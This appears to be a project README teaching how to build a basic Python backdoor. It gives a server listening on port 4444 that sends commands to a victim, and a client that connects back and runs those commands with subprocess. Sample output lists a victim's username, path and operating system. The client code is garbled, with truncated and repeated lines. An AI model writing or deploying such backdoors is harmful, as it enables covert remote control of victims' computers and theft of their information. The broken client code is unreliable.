
Demo Attack

Primary LanguagePython

Created Malware - Backdoor in python

this is a basic project on how to create malware or backdoor , to get some sensitive information of the victim in cmd , as well as you can gain more knowledge about network security

When talking about security related issues for networks and computers, we will come across the word  backdoor. Backdoor for me is like a mystery and always urges to explore. So what are backdoors?

  • In a simple and common understanding, a backdoor is a backdoor and is created by hackers to sneak into a system after they have entered for the first time.
  • And what makes me even more curious is how the backdoor is created? After wandering around on the Internet, I also figured out how to create a simple  backdoor in Python.
  • and also remind that, you can't abuse it for illegal purposes, because, if you have an IP or a Proxy that can open Port Route, and it's very dangerous to everyone around.

note : To make it easier to understand, we should have basic knowledge of network programming as well as knowledge of computer networks.

problem start

The malware or backdoor is built according to the  Client/Server model. In which the server is controlled by us, the client is the victim's computer Backdoor is written in Python language and uses Python's socket mail.

Backdoor uses TCP/IP and IPv4 protocols to communicate between Client and Server.

first you create me a file named 'server.py' and use python socket to create a server like a server of a certain website


import socket

admin_host = ''
admin_port = 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((admin_host, admin_port))

print("[*] Listening..")

all_connect, address = s.accept()

print("Found Address :", address)
output = all_connect.recv(10024)
print("Output : \n" + "User :", output.decode())

output = all_connect.recv(10024)
print("Output : \n" + "path :", output.decode())

all_connect.send(b'uname -o')
output = all_connect.recv(10024)
print("Output : \n" + "system :", output.decode())

The above code creates a server that listens for connections from clients. Receive connection and send message to client.

  • First we need to import python's socket library and create a socket. AF_INET parameter for  IPv4, SOCK_STREAM parameter TCP. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

  • Our code uses 2 variables admin_host and admin_port to specify the server's IP address and listening port. IP is a string, and PORT is an integer.

  • The generated socket cannot be reused. s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) to avoid errors.

  • s.bind() is used to bind the socket to the address. In TCP sockets are distinguished by IP and port pairs. So the parameter passed is a tuple of IP and port.

  • s.listen() server starts listening for connections on the previously associated address. The parameter passed in is meant to accept only a certain number of connections.

  • s.accept() accept incoming connections.


import socket
import subprocess

conn_host = ''
conn_port = 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((conn_host, conn_port))

output_from_server_attacker = s.recv(1024)

data = subprocess.check_output(
output_from_server_attacker = s.recv(1024)
data = subprocess.check_output(
output_from_server_attacker = s.recv(1024)
data = subprocess.check_output(

The client also uses some functions like server. But the difference is that  s.connect() connects to the IP and PORT of the listening server.

  • Run a test and see the results.
  • Note: Must run the server first and then run the client. So finished malware or backdoor code in python. Next, let's check it out with me


root@localhost ~# python server.py

[*] Listening..
Found Address : ('', 58036)
Output :
User : u0_a193

Output :
path : /data/data/com.termux/files/home

Output :
system : Android